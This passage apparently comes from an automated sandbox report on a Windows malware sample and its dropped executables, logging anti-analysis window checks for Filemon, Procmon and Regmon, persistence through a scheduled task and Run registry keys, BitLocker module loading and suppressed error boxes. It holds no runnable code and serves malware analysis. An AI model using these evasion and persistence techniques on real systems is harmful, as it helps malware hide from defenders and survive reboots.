                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b9ba85c997.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b9ba85c997.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e6e4c20fad.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e6e4c20fad.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fb584dabd7.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fb584dabd7.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 96e283ac77.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 96e283ac77.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
